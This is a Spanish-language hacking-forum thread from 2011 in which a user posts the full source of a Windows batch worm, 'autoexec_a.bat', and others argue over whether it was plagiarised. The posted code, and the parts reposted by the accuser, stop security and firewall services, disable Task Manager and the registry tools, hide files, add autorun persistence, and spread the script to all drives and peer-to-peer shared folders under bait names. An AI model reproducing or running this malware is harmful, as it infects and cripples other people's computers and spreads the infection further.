virus autoexec

Foro de elhacker.net

Programación

Scripting

virus autoexec_a.bat

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: virus autoexec_a.bat (Leído 3,120 veces)

W4rR3d

Desconectado

Mensajes: 12

virus autoexec_a.bat

« en: 3 Febrero 2011, 22:50 pm »

me gusta la programacion en batch y en visual besic script y un poco de seguridad informatica. aca les dejo una de mis creaciones espero que lo corrijan si ven un error
su amigo W4rR3d - AAHH. San Martin- Av. maria galan - Piura -Peru
este virus informatico se llama autoexec_a.bat, esta creado en batch

Código

@echo off
:: este virus fue creado por hacked by W4rR3d
:: este virus esta dedicado a la comunidad hacker piura- peru
msg * hacked by -={W4rR3d}=-
Set inic= %programfiles%
tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1
net stop "Security Center"
net stop "centro de seguridad"
net stop "SharedAccess"
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFolderOptions /t REG_DWORD /d 1 /f 
reg add "HKCUSoftwareMicrosoftWindowsCurrentversionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 1 /f 
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 1 /f 
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL" /v CheckedValue /t reg_dword /d 1 /f 
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Hidden /t REG_DWORD /d 2 /f 
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v HideFileExt /t REG_DWORD /d 1 /f 
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f 
for /F %%- in (MSMemoticon,PhotoshopCS4,FreeXXXPhotos,Office2009,VideosCaidasHumor,videosporn,wallpapers,wormgenerator) do (call :p2prop %%-)
copy /y "%0" "%homedrive%\autoexec_a.bat">nul 2>&1
reg add hklm\software\microsoft\windows\currentversion\run /v systemwar /t reg_sz /d %homedrive%\autoexec_a.bat /f
echo.[Autorun] >> %homedrive%\Autorun.inf
echo.label=Pendrive >> %homedrive%\Autorun.inf
echo.action=Abrir Pendrive >> %homedrive%\Autorun.inf
echo.shellexecute="/autoexec_a.bat" >> %homedrive%\Autorun.inf
for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
copy /Y "%0" "%%#:\autoexec_a.bat">nul 2>&1
attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
attrib +R +S +H "%%#:\autoexec_a.bat">nul 2>&1
)
(echo.^<HTML^>
echo.%^<HEAD^>
echo.^<title^>HACKED BY W4rR3d^</title^>
echo.^</HEAD^>
echo.^<BODY^>
echo.^<H1^>         ~~~HACKED BY W4rR3d~~~
echo.^</BODY^>
echo.^</HTML^>)>%homedrive%\IDEAS.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ddjsys /t REG_SZ /d %homedrive%\IDEAS.HTML
)
start %homedrive%\IDEAS.HTML
:p2prop
set var=%1
copy /y "%0" "%inic%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\ICQ\shared files\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Shareaza\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\eMule\Incoming\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Filetopia3\Files\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\XoloX\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Gnucleus\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\LimeWire\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Grokster\My Grokster\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Overnet\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Swaptor\Download\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Tesla\Files\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\BearShare\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\Rapigator\Share\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\KMD\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%inic%\appleJuice\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
goto:eof


« Última modificación: 3 Febrero 2011, 23:26 pm por Leo Gutiérrez. »	En línea

xassiz~

Desconectado

Mensajes: 457

Re: virus autoexec_a.bat

« Respuesta #1 en: 3 Febrero 2011, 22:57 pm »

Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:


	En línea

#ka0labs
#byte-inside
#twitter

kingdarnakes

Desconectado

Mensajes: 23

Re: virus autoexec_a.bat

« Respuesta #2 en: 3 Febrero 2011, 23:12 pm »

Cita de: pablomi en 3 Febrero 2011, 22:57 pm

Que pena que algunas partes del código sean exactamente IGUAL a un "virus" que programé hace dos años. :rolleyes:

Nadie lo duda, pero sino aportas pruebas yo también puedo decir que lo hice yo.

Aunque viendo el post no me estraña que sea un ripper porque no ha usado etiquetas y se notan ciertas partes de diferente estilo con respecto a la programación y al nivel.


	En línea

xassiz~

Desconectado

Mensajes: 457

Re: virus autoexec_a.bat

« Respuesta #3 en: 3 Febrero 2011, 23:30 pm »

Cita de: kingdarnakes en 3 Febrero 2011, 23:12 pm

En el código original no era IDEAS.html, era IEAS:

Código

:IEAS
(ECHO.^<HTML^>
ECHO.^<HEAD^>
ECHO.^<title^>HACKED BY [antiguo_nick_mio]^</title^>
ECHO.^</HEAD^>
ECHO.^<BODY^>
ECHO.^<H1^>                  ~~~HACKED BY [antiguo_nick_mio]~~~
ECHO.^</BODY^>
ECHO.^</HTML^>)>%HOMEDRIVE%\IEAS.HTML
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v aErx_sys /t REG_SZ /d "%HOMEDRIVE%\IEAS.HTML"
ATTRIB +H %HOMEDRIVE\IEAS.HTML
GOTO:EOF

Esta linea:

Código

tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1

copiada tal cual de otro virus mío que llamé "BaTr00t_a".

Código

for %%# in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (
copy /Y "%homedrive%\autorun.inf" "%%#:\autorun.inf">nul 2>&1
copy /Y "%0" "%%#:\baTr00t_a.bat">nul 2>&1
attrib +R +S +H "%%#:\autorun.inf">nul 2>&1
attrib +R +S +H "%%#:\baTr00t_a.bat">nul 2>&1
)

Lo mismo con esta parte, que el ripper no fue muy hábil porque como podeis ver en el código tiene puesto autoexec_a (conservando el _a).

Y esta parte:

Código

:p2prop
set var=%1
copy /y "%0" "%programfiles%\Morpheus\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\ICQ\shared files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KaZaA\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Shareaza\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\EDONKEY2000\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\eMule\Incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Filetopia3\Files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\XoloX\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Gnucleus\Downloads\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\LimeWire\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Grokster\My Grokster\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Overnet\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%appdata%\Ares\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Swaptor\Download\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\WinMX\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Tesla\Files\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\BearShare\Shared\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Rapigator\Share\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KaZaA Lite\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\KMD\My Shared Folder\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\appleJuice\incoming\%var%.bat">nul 2>&1
copy /y "%0" "%programfiles%\Direct Connect\Received Files\%var%.bat">nul 2>&1
goto:eof

Ya ni siquiera se molestó en modificarla.

La creación del autorun.inf lo mismo.

En realidad todo es mío, solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.

No aporto links para no hacer spam, pero en google podeis encontrarlo.

Pero vamos, que me da igual, que sigan rippeando, así llegarán lejos.

Saludos!


« Última modificación: 3 Febrero 2011, 23:33 pm por pablomi »	En línea

#ka0labs
#byte-inside
#twitter

kingdarnakes

Desconectado

Mensajes: 23

Re: virus autoexec_a.bat

« Respuesta #4 en: 3 Febrero 2011, 23:36 pm »

Doy fe de ello... Ahora mismo lo acabo de comprobar...

Citar

solo que el mío se auto-ocultaba con VBScript y se autoejecutaba con una bomba fork.

No sabría para que se usaba esa parte de código o no le gustaría y por eso la borro :silbar:

.

Lastima que no pueda reportar el mensaje a un moderador, espero que lo vea alguno, odio a los ripper... >:D


	En línea

leogtz

. . .. ... ..... ........ ............. .....................
Colaborador

Desconectado

Mensajes: 3.069

/^$/

Re: virus autoexec_a.bat

« Respuesta #5 en: 3 Febrero 2011, 23:37 pm »

Código

tasskill /im explorer.exe /f>nul 2>&1 || taskill explorer>nul 2>&1

Es taskkill, no tasskill ni taskill.

Bueno, cierro el tema, no aployo el plagio de código, además de que los "virus" en Batch son una *****.


	En línea

Código

(( 1 / 0 )) &> /dev/null || {
	echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

Páginas: [1]

Ir a: